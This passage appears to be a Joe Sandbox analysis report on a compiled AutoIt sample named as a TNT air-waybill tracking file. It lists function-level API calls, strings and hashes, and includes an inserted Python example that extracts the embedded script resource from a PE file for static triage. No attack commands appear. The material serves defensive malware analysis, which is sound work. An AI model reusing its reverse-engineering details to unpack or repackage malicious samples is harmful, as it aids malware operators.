                                                      • Part of subcall function 00EC3A46: GetSysColorBrush.USER32(0000000F), ref: 00EC3A50
                                                      • Part of subcall function 00EC3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00EC3A5F
                                                      • Part of subcall function 00EC3A46: LoadIconW.USER32(00000063), ref: 00EC3A76
                                                      • Part of subcall function 00EC3A46: LoadIconW.USER32(000000A4), ref: 00EC3A88
                                                      • Part of subcall function 00EC3A46: LoadIconW.USER32(000000A2), ref: 00EC3A9A
                                                      • Part of subcall function 00EC3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EC3AC0
                                                      • Part of subcall function 00EC3A46: RegisterClassExW.USER32(?), ref: 00EC3B16
                                                      • Part of subcall function 00EC39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EC3A03
                                                      • Part of subcall function 00EC39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC3A24
                                                      • Part of subcall function 00EC39D5: ShowWindow.USER32(00000000,?,?), ref: 00EC3A38
                                                      • Part of subcall function 00EC39D5: ShowWindow.USER32(00000000,?,?), ref: 00EC3A41
                                                      • Part of subcall function 00EC434A: _memset.LIBCMT ref: 00EC4370
                                                      • Part of subcall function 00EC434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EC4415
                                                    Strings
                                                    • runas, xrefs: 00EFD33A
                                                    • This is a third-party compiled AutoIt script., xrefs: 00EFD279
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                    • API String ID: 529118366-3287110873
                                                    • Opcode ID: 43c60d3346f3a229061abd3cbfd0521645c4f42235e044f179df1a9c52637c38
                                                    • Instruction ID: f27fd2d88cad26e00998f931eeed6af383a158d732cba1ed2d8d9fd3fde32b99
                                                    • Opcode Fuzzy Hash: 43c60d3346f3a229061abd3cbfd0521645c4f42235e044f179df1a9c52637c38
                                                    • Instruction Fuzzy Hash: 9151F67090820CABDF11EBB4DD05FFDBBB5AB55B14F00906DF855B21A2CA728607EB21

                                                    Control-flow Graph

                                                    (graph not reproduced: basic-block edge list for the function starting at ec49a0; the entry block ec49a0-ec4a00 calls ec7667, GetVersionExW and ec7bcc, later blocks reach GetCurrentProcess/IsWow64Process, GetNativeSystemInfo, GetSystemInfo and FreeLibrary)
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00EC49CD
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    • GetCurrentProcess.KERNEL32(?,00F4FAEC,00000000,00000000,?), ref: 00EC4A9A
                                                    • IsWow64Process.KERNEL32(00000000), ref: 00EC4AA1
                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00EC4AE7
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00EC4AF2
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00EC4B23
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00EC4B2F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                    • String ID:
                                                    • API String ID: 1986165174-0
                                                    • Opcode ID: 75cfc2db4825a4984b24c68e2739e32ab2e0817e3c9d7a8faa0128ee43bb33de
                                                    • Instruction ID: c9dcbc0e8926f759767dd0f6ac81d02ca1351e863394d2cab54eec9013b087c6
                                                    • Opcode Fuzzy Hash: 75cfc2db4825a4984b24c68e2739e32ab2e0817e3c9d7a8faa0128ee43bb33de
                                                    • Instruction Fuzzy Hash: 0091397188D7C4CEC731DB7885606AAFFF5AF3A304B08595ED0CBA3A81D221E909D759

                                                    Control-flow Graph

                                                    (graph not reproduced: basic-block edge list for the function starting at ec4e89; the entry block ec4e89-ec4ea1 calls CreateStreamOnHGlobal, followed by FindResourceExW, LoadResource, SizeofResource and LockResource in the efd933-efd98b blocks)
                                                    APIs
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00EC4D8E,?,?,00000000,00000000), ref: 00EC4E99
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EC4D8E,?,?,00000000,00000000), ref: 00EC4EB0
                                                    • LoadResource.KERNEL32(?,00000000,?,?,00EC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EC4E2F), ref: 00EFD937
                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00EC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EC4E2F), ref: 00EFD94C
                                                    • LockResource.KERNEL32(00EC4D8E,?,?,00EC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EC4E2F,00000000), ref: 00EFD95F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: a2987b44895a5511a69bdf8dd8fb3745b416b63a276c54acd8af695b0e88633b
                                                    • Instruction ID: cfa42535cce34def98912d9d4d51763349a513011992de37dbcba55c106f2599
                                                    • Opcode Fuzzy Hash: a2987b44895a5511a69bdf8dd8fb3745b416b63a276c54acd8af695b0e88633b
                                                    • Instruction Fuzzy Hash: 11115EB5240704BFD7218B65EC48F677BBAFBC5B11F10426CF9099A290DBA2E8059660
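                                                     The API sequence above (CreateStreamOnHGlobal, then FindResourceExW with type 0x0A, which is RT_RCDATA, and the name "SCRIPT", then LoadResource / SizeofResource / LockResource) is the AutoIt runtime locating its own embedded compiled script in the image's resource section and wrapping it in a COM stream; it is the same resource the report's "compiled AutoIt script" verdict rests on. For static triage the practical step is to pull that RT_RCDATA/"SCRIPT" blob out of the PE without running it. The following is an added example, not code from the report or from AutoIt: a pure-Python (struct only) resource-directory walker that mirrors the FindResourceExW lookup (type, then name, then any language), plus a heuristic `extract_autoit_script` wrapper. The "AU3!" marker check is an assumption about the common compiled-script layout, not something the report states, and `build_sample_pe` constructs a synthetic minimal PE32 so the code runs offline; it is not the analysed sample.

```python
import struct

RT_RCDATA = 10  # resource type 0xA, the value passed to FindResourceExW in the report


def _parse_headers(pe):
    """Return (section_table, resource_dir_rva); raise ValueError if not a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    num_sections, size_opt = struct.unpack_from("<H12xH", pe, coff + 2)
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]            # 0x10B = PE32, 0x20B = PE32+
    dd_base = opt + (96 if magic == 0x10B else 112)         # first data directory
    res_rva = struct.unpack_from("<I", pe, dd_base + 2 * 8)[0]  # index 2 = resources
    sections = []
    for i in range(num_sections):
        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        sections.append(struct.unpack_from("<IIII", pe, opt + size_opt + i * 40 + 8))
    return sections, res_rva


def _rva_to_offset(sections, rva):
    """Map an RVA onto a file offset using the section table."""
    for vsize, vaddr, raw_size, raw_ptr in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return rva - vaddr + raw_ptr
    raise ValueError("RVA 0x%x is not inside any section" % rva)


def _dir_entries(pe, res_base, dir_off):
    """Yield (name_or_id, target_offset, is_subdir) for one IMAGE_RESOURCE_DIRECTORY."""
    n_named, n_id = struct.unpack_from("<HH", pe, res_base + dir_off + 12)
    pos = res_base + dir_off + 16
    for _ in range(n_named + n_id):
        name, target = struct.unpack_from("<II", pe, pos)
        pos += 8
        if name & 0x80000000:  # named entry: offset to IMAGE_RESOURCE_DIR_STRING_U
            s = res_base + (name & 0x7FFFFFFF)
            length = struct.unpack_from("<H", pe, s)[0]
            name = pe[s + 2:s + 2 + 2 * length].decode("utf-16-le")
        yield name, target & 0x7FFFFFFF, bool(target & 0x80000000)


def find_resource(pe, res_type, res_name):
    """Bytes of the first type/name match in any language, like FindResourceExW(lang=0)."""
    sections, res_rva = _parse_headers(pe)
    if res_rva == 0:
        raise LookupError("image has no resource directory")
    res_base = _rva_to_offset(sections, res_rva)
    for t_name, t_off, t_sub in _dir_entries(pe, res_base, 0):            # type level
        if not t_sub or t_name != res_type:
            continue
        for n_name, n_off, n_sub in _dir_entries(pe, res_base, t_off):    # name level
            if not n_sub or str(n_name).upper() != str(res_name).upper():  # names are case-insensitive
                continue
            for _lang, l_off, l_sub in _dir_entries(pe, res_base, n_off):  # language level
                if not l_sub:  # leaf IMAGE_RESOURCE_DATA_ENTRY: OffsetToData (RVA), Size, ...
                    data_rva, size = struct.unpack_from("<II", pe, res_base + l_off)
                    start = _rva_to_offset(sections, data_rva)
                    return pe[start:start + size]
    raise LookupError("resource %r/%r not found" % (res_type, res_name))


def extract_autoit_script(pe):
    """Return (blob, looks_like_au3) for the RT_RCDATA/"SCRIPT" resource.
    The marker test is a heuristic assumption, not a fact from the report."""
    blob = find_resource(pe, RT_RCDATA, "SCRIPT")
    return blob, b"AU3!" in blob[:64]


def build_sample_pe(payload):
    """Constructed minimal PE32 (not the analysed sample) with one .rsrc section
    holding RT_RCDATA / "SCRIPT" / lang 0x0409 = payload, so the walker runs offline."""
    rsrc_rva, rsrc_raw = 0x1000, 0x200
    rsrc = bytearray(0x70)
    struct.pack_into("<HH", rsrc, 0x0C, 0, 1)                                   # root: one ID entry
    struct.pack_into("<II", rsrc, 0x10, RT_RCDATA, 0x80000000 | 0x18)           # -> type subdir
    struct.pack_into("<HH", rsrc, 0x24, 1, 0)                                   # type dir: one named entry
    struct.pack_into("<II", rsrc, 0x28, 0x80000000 | 0x58, 0x80000000 | 0x30)   # "SCRIPT" -> name subdir
    struct.pack_into("<HH", rsrc, 0x3C, 0, 1)                                   # name dir: one language entry
    struct.pack_into("<II", rsrc, 0x40, 0x0409, 0x48)                           # lang 0x0409 -> leaf
    struct.pack_into("<IIII", rsrc, 0x48, rsrc_rva + 0x70, len(payload), 0, 0)  # data entry
    struct.pack_into("<H", rsrc, 0x58, 6)                                       # IMAGE_RESOURCE_DIR_STRING_U
    rsrc[0x5A:0x66] = "SCRIPT".encode("utf-16-le")
    rsrc += payload
    hdr = bytearray(rsrc_raw)
    hdr[:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                                     # e_lfanew
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)    # COFF header
    struct.pack_into("<H", hdr, 0x58, 0x10B)                                    # PE32 optional header magic
    struct.pack_into("<II", hdr, 0x58 + 96 + 16, rsrc_rva, len(rsrc))          # resource data directory
    hdr[0x138:0x140] = b".rsrc\0\0\0"                                           # section table entry
    struct.pack_into("<IIII", hdr, 0x140, len(rsrc), rsrc_rva, len(rsrc), rsrc_raw)
    return bytes(hdr + rsrc)
```

                                                     Usage against a real file is `extract_autoit_script(open(path, "rb").read())`; the returned blob is what the runtime hands to CreateStreamOnHGlobal, and a `False` marker result with a present "SCRIPT" resource means the layout differs from the assumed one, not that the file is clean. The walker resolves RVAs through the section table rather than assuming the resource section is mapped at its file offset, which matters for packed or section-rearranged samples.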
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID:
                                                    • API String ID: 3964851224-0
                                                    • Opcode ID: 57fbedc0ab15f9b8cf22c88328625ff5b7936d10689eb1873e540d5ce5728ce6
                                                    • Instruction ID: 869ce9a3fd146dc4cf45c08509f715501fabe5bd2e65d98143d126f3114da8fb
                                                    • Opcode Fuzzy Hash: 57fbedc0ab15f9b8cf22c88328625ff5b7936d10689eb1873e540d5ce5728ce6
                                                    • Instruction Fuzzy Hash: 9992AE706083418FD720DF14C580B6AB7E1FF85314F18982DE99AAB3A2D771EC46DB92
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00EFE398), ref: 00F2446A
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00F2447B
                                                    • FindClose.KERNEL32(00000000), ref: 00F2448B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: e7211496436267a10a7ed2670f989b1a4a2b6961b46ea2865b6963ae97ce8589
                                                    • Instruction ID: 98b9fc460e058a125a0eec543a91d7bb86edb48a5be83d6e434d61fd322fc6be
                                                    • Opcode Fuzzy Hash: e7211496436267a10a7ed2670f989b1a4a2b6961b46ea2865b6963ae97ce8589
                                                    • Instruction Fuzzy Hash: BBE0D8378109146B4210BB38FC0D4EA775C9E16335F100716FD39C10D0E7F46904B595
                                                    Strings
                                                    • Variable must be of type 'Object'., xrefs: 00F03E62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Variable must be of type 'Object'.
                                                    • API String ID: 0-109567571
                                                    • Opcode ID: bd5d5a6f3db31c26aec264e2adc6cb77e68c9bb3bb318c5534c1bae7442bd28b
                                                    • Instruction ID: e0ce0f9ee3775f611dca1fed1c976b70c615fec6d2583bfca774248b4df8f49c
                                                    • Opcode Fuzzy Hash: bd5d5a6f3db31c26aec264e2adc6cb77e68c9bb3bb318c5534c1bae7442bd28b
                                                    • Instruction Fuzzy Hash: 07A26975A00209CFCB24CF54CA80FAEB7B6FB59314F28906DE905AB351D776AD42DB90
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED0A5B
                                                    • timeGetTime.WINMM ref: 00ED0D16
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED0E53
                                                    • Sleep.KERNEL32(0000000A), ref: 00ED0E61
                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00ED0EFA
                                                    • DestroyWindow.USER32 ref: 00ED0F06
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ED0F20
                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00F04E83
                                                    • TranslateMessage.USER32(?), ref: 00F05C60
                                                    • DispatchMessageW.USER32(?), ref: 00F05C6E
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F05C82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                    • API String ID: 4212290369-3242690629
                                                    • Opcode ID: bf56556d6fa4df6d76652275a1aef7022323596b1865df1e90b22258335d813c
                                                    • Instruction ID: a908e325d3adecff6fe12dac3c63ccbfe04e357f2b778c54fdb7677932a0fb8c
                                                    • Opcode Fuzzy Hash: bf56556d6fa4df6d76652275a1aef7022323596b1865df1e90b22258335d813c
                                                    • Instruction Fuzzy Hash: A0B2C070608741DFD724DF24C884BABB7E1FF84714F14491EE89AA72A1C7B5E885EB42

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00F28F5F: __time64.LIBCMT ref: 00F28F69
                                                      • Part of subcall function 00EC4EE5: _fseek.LIBCMT ref: 00EC4EFD
                                                    • __wsplitpath.LIBCMT ref: 00F29234
                                                      • Part of subcall function 00EE40FB: __wsplitpath_helper.LIBCMT ref: 00EE413B
                                                    • _wcscpy.LIBCMT ref: 00F29247
                                                    • _wcscat.LIBCMT ref: 00F2925A
                                                    • __wsplitpath.LIBCMT ref: 00F2927F
                                                    • _wcscat.LIBCMT ref: 00F29295
                                                    • _wcscat.LIBCMT ref: 00F292A8
                                                      • Part of subcall function 00F28FA5: _memmove.LIBCMT ref: 00F28FDE
                                                      • Part of subcall function 00F28FA5: _memmove.LIBCMT ref: 00F28FED
                                                    • _wcscmp.LIBCMT ref: 00F291EF
                                                      • Part of subcall function 00F29734: _wcscmp.LIBCMT ref: 00F29824
                                                      • Part of subcall function 00F29734: _wcscmp.LIBCMT ref: 00F29837
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F29452
                                                    • _wcsncpy.LIBCMT ref: 00F294C5
                                                    • DeleteFileW.KERNEL32(?,?), ref: 00F294FB
                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F29511
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F29522
                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F29534
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 1500180987-0
                                                    • Opcode ID: 2c14a9255b604b02b761299a8301c3caa4481832658638a698649e82cc71cd4b
                                                    • Instruction ID: c156d4694b2c4cc8a73545f0510f1f622c6a56c52c344bc3d304f2ff06f61702
                                                    • Opcode Fuzzy Hash: 2c14a9255b604b02b761299a8301c3caa4481832658638a698649e82cc71cd4b
                                                    • Instruction Fuzzy Hash: 8CC14BB1E00229AADF21DF95DC85EDEBBBCEF45310F0040AAF609E7141EB709A459F65

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EC3074
                                                    • RegisterClassExW.USER32(00000030), ref: 00EC309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC30AF
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00EC30CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC30DC
                                                    • LoadIconW.USER32(000000A9), ref: 00EC30F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 33aa434578d347dffff084270fdb6f1f106b634b9a44b7d4cda727a795287b91
                                                    • Instruction ID: 83eb9a72e0040f19ff57657a91faeb212c3269239a95159056b0cbe06cff9654
                                                    • Opcode Fuzzy Hash: 33aa434578d347dffff084270fdb6f1f106b634b9a44b7d4cda727a795287b91
                                                    • Instruction Fuzzy Hash: 85316775844349AFDB10DFA4DC88AD9BFF0FB1A710F14002EE980E62A0D3B90589DF51

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EC3074
                                                    • RegisterClassExW.USER32(00000030), ref: 00EC309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC30AF
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00EC30CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC30DC
                                                    • LoadIconW.USER32(000000A9), ref: 00EC30F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 4bbe1bc266083d06212a35f80561ebbf51fee17cfaccba0398a7df6302f665df
                                                    • Instruction ID: ad3e98d6b3b0618275e43733986d7da14195030992b2d94fea1664cfaf6ab19b
                                                    • Opcode Fuzzy Hash: 4bbe1bc266083d06212a35f80561ebbf51fee17cfaccba0398a7df6302f665df
                                                    • Instruction Fuzzy Hash: B621C5B5D5121CAFDB00DFA4EC49BDDBBF4FB09B00F00412AF915A62A0D7B54548AF91

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00EC4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F852F8,?,00EC37AE,?), ref: 00EC4724
                                                      • Part of subcall function 00EE050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00EC7165), ref: 00EE052D
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00EC71A8
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EFE8C8
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EFE909
                                                    • RegCloseKey.ADVAPI32(?), ref: 00EFE947
                                                    • _wcscat.LIBCMT ref: 00EFE9A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
